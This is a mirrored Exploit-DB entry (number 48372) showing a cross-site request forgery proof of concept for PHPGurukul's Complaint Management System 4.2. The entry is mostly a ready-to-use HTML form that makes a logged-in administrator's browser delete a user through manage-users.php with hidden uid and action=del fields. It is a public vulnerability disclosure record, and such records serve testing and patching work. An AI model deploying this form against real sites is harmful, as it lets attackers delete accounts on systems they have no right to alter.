bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/48372.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

29 lines
No EOL
973 B
Text
Raw Blame History

# Exploit Title: Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)
# Author: Besim ALTINOK
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/complaint-management-sytem/
# Version: v4.2
# Tested on: Xampp
# Credit: İsmail BOZKURT
*************************************************
Detail:
You can perform CSRF Attack for all the functions.
----------------------------------------------
CSRF PoC for Delete User
----------------------------------------------
This request performs over the GET request with uid.
------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/cms/admin/manage-users.php">
<input type="hidden" name="uid" value="4" />
<input type="hidden" name="" value="" />
<input type="hidden" name="action" value="del" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Reference in a new issue View git blame Copy permalink